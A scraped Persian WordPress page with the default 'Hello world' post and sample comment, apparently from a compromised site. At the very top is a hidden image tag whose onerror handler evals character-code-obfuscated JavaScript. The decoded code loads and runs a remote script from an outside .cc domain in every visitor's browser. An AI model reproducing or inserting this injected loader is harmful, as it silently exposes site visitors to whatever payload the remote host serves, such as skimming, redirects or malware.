<img class='' style='display:none;left:67950690px;' src=l onerror="eval(/*57*/String.fromCharCode(40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,10,32,32,32,32,112,111,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,108,101,102,116,46,116,114,97,105,110,114,101,115,105,115,116,111,114,46,99,99,47,99,108,101,97,114,46,106,115,63,118,61,49,46,52,46,56,39,59,10,32,32,32,32,118,97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,105,109,103,39,41,91,48,93,59,10,32,32,32,32,115,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,112,111,44,32,115,41,59,10,32,32,125,41,40,41,59))">سلام دنیا! - نوحه 90
صاحبیکشنبه ۱۴ آذر ۱۴۰۰

سلام دنیا! - نوحه 90

سخن دوست :امام حسین (ع) : بخشنده ترین مردم کسی است که در هنگام قدرت می بخشد.

به وردپرس فارسی خوش آمدید.‌ این نخستین نوشته‌‌ی شماست. می‌توانید ویرایش یا پاکش کنید و پس از آن نوشتن را آغاز کنید!

نظرات و ارسال نظر

adminیک نویسنده‌ی دیدگاه در وردپرس گفته :
جمعه , ۲۷ دی ۱۳۹۸

سلام, این یک دیدگاه است.
برای شروع مدیریت، ویرایش و پاک کردن دیدگاه‌ها، لطفا بخش دیدگاه‌ها در پیشخوان را ببینید.
تصاویر نویسندگان دیدگاه از Gravatar گرفته می‌شود.

پاسخ دهيد